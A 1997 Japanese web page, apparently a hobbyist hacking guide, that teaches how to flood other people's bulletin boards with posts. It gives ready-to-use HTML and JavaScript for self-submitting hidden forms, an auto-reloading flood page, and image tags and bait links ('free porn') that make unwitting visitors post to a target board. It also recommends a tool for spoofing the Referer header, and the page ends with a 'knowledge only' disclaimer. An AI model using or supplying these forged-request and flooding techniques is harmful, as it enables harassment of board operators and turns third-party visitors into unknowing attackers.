ボタン・外部フォーム

どこかの掲示板の投稿の中に、

こんなボタンが貼り付けてあるのを見かけられたと思います。（このボタンは作動しません）
これは<form>を使ってターゲット掲示板にあらかじめ用意された（たとえば「死ね死ね死ね」というような）メッセージを送り付けるhtmlスクリプトです。ソースはこんな感じです。

<script language=JavaScript> function Warning() { document.frm1.sbmt.click(); return true; } </script> <body OnLoad=Warning();> <form name=frm1 method=post action=ターゲットcgiのURL> <input type=hidden name=action value=regist> <input type=hidden name=name value=適当な名前> <input type=hidden name=email value=適当なメールアドレス> <input type=hidden name=subject value=適当な題名> <input type=hidden name=value value=適当な文章> <input type=submit name=sbmt value="押してみよう"> </form> </body>

　

これはターゲットとされた掲示板によって一部違ってくる物なのでこのスクリプトですべての掲示板に書き込み攻撃が出来るわけではありません。<script>タグはJavaScriptで、このフォームが貼ってある所を見た人が「押してみよう」ボタンを押さなくっても自動的に送信されてしまうように設定するものです。

---

この方法の特徴

• スクリプトが貼り付けられた掲示板の来訪者（カモ）が勝手にターゲットを攻撃してくれるので、アシが付きにくい。
• 内容は何バイトでも送信できる。
• フォームリメーラーなどで応用できる。（完全匿名メール爆撃に使える）

ただし、現在のほとんどの掲示板は<script><body>などのタグが貼り付けられないので、このスクリプトはあまり使い物になりません。その時は・・

---

自分のパソコンに攻撃用のhtmlを作って、自動リロードさせる・・・なんて方法もあります。

<html> <meta http-equiv=refresh content="3; url=このhtmlの名前.htm"> <head><title>自動攻撃フォーム</title></head> <body OnLoad=document.frm1.submit();> <form name=frm1 method=post action="ターゲットcgiのURL"> <input type=hidden name="action" value="regist"> <input type=hidden name="name" value="なまえ"> <input type=hidden name="email" value="E−Mail"> <input type=hidden name="subject" value="サブジェクト"> <input type=hidden name=value value=適当な文章> <input type=submit value=" 投稿 "> </form> </body> </html>

この場合はjavaで自動投稿しながら、metaタグでフォームhtmlをリロードさせています。javaでリロードもさせられますけど、書くとやる人いるから、自分で考えてください（笑）。このフォームの場合、100回くらいリロードするとメモリフローで落ちます。

外部書き込みになるので、refererを誤魔化さないと書き込めませんから、ガブリエナイを使います。

---

イメージ見せかけタグ

<form>が、書かれた内容を送信する方法には２つあります。ひとつはURLにくっつけて送信するもの（get）、もうひとつはURLと別に送信するもの（post）です。これは、<form>中の、「method」で指定されています。

getの場合、内容はURLに付加されて送信されるので、ブラウザのURL欄は送信後こんな感じになっているはずです。

http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章

実際には日本語はデコードされて「%1%2%3」の様に表示されています。postの場合は内容はURLと別に送信されているので、URL欄は送信後も変わりません。

大概の掲示板でmethodはpostですが、実はほとんど、

「postが指定されてる掲示板ではgetでも投稿できてしまう」

のです！最新版のminibbsなどでは出来なくなってますが・・。

これを利用して、掲示板に自動投稿するのが「イメージ見せかけタグ」と呼ばれる物です。

<img src="http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章">

また、リンクに見せかける事も出来ます。

<a href="http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章">☆すべてタダ！極悪えっち画像☆</a>

リンクの場合、

<a href="" onMouseOver="location.href='http://www.server.url/bbs.cgi?action=regist&name=適当な名前&email=適当なメールアドレス&subject=適当な題名&value=適当な文章'">☆すべてタダ！極悪えっち画像☆</a>

と、JavaScriptを追加してやればリンクの上をマウスカーソルが通過しただけで自動書き込みさせることも出来ます。この場合はリンク部分の文（☆すべてタダ！極悪えっち画像☆）はなるべく横いっぱいに表示させます。

この方法の特徴

• イメージタグなので投稿後もターゲットURLにジャンプすることなく、カモに悟られにくい。
• 内容を変えて色々な文面で同時刻に多重投稿でき、ターゲット管理人が無知な場合、投稿時刻の間隔を見てクラックされたと思い込む。（同じ文面だとキャッシュからロードされてしまうので違った文面にする）

  ---

でも・・・

カキコ出来ない場合・・。そのターゲットはHTTP_REFERERの環境変数で外部書き込みかどうかチェックしているのでしょう。これは通常の方法ではどうする事も出来ません。一般的な対策テクニックです。

しかし、あるアプリケーション・・・・そう、Gabrielを使えば軽くクリアできました。ただGabrielにはちょっとしたイタズラが仕掛けてあったので（あるアドレスに環境が記載されたメールが送られるとか・・。製作者はメールボム食らったようなメール量だったとか言ってました）現在は爆弾抜きバージョン、Gabrienaiを公開しています

→Gabrienaiダウンロードページ

戻る

• 本ページの内容は予告無く変更することが私の気分によりちょくちょくあります。
• 本ページの画像を含むコンテンツを許可なく無断で勝手に転載することは個人の責任において行ってください。
• 本ページへのリンクは許可なく無断で勝手に行ってください。
• 本ページの内容はあくまでも知識として掲載した物です。情報の実際の活用その他は個人の責任において行ってください。

(C)1997 代参神道教師・アリス=リデル
All rights reserved.